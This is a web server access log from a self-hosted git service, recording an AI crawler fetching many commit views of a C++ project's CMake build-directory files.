git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10116] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:38:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10113] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:38:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10112] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:38:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api" -[17/Feb/2026:16:38:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api" -[17/Feb/2026:16:38:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api" -[17/Feb/2026:16:39:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api" -[17/Feb/2026:16:39:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api" -[17/Feb/2026:16:39:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api" -[17/Feb/2026:16:39:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api" -[17/Feb/2026:16:39:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api" -[17/Feb/2026:16:39:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake" -[17/Feb/2026:16:39:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake" -[17/Feb/2026:16:39:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake" -[17/Feb/2026:16:39:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9926] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api" -[17/Feb/2026:16:39:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10112] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:39:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10117] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:39:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10111] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:39:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10114] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:39:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10115] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:39:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10653] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:39:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10656] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:39:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10654] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10654] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10654] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:39:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9916] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api" -[17/Feb/2026:16:39:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake" -[17/Feb/2026:16:39:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake" -[17/Feb/2026:16:39:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake" -[17/Feb/2026:16:39:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake" -[17/Feb/2026:16:39:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake" -[17/Feb/2026:16:39:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:39:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:39:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:39:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14318] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:39:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:39:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:39:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14320] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:39:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14319] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:39:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14318] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:39:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14320] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:39:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10656] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:39:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10655] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:39:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10656] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:39:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10087] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake" -[17/Feb/2026:16:39:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:39:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:39:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14603] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:39:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" -[17/Feb/2026:16:39:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr 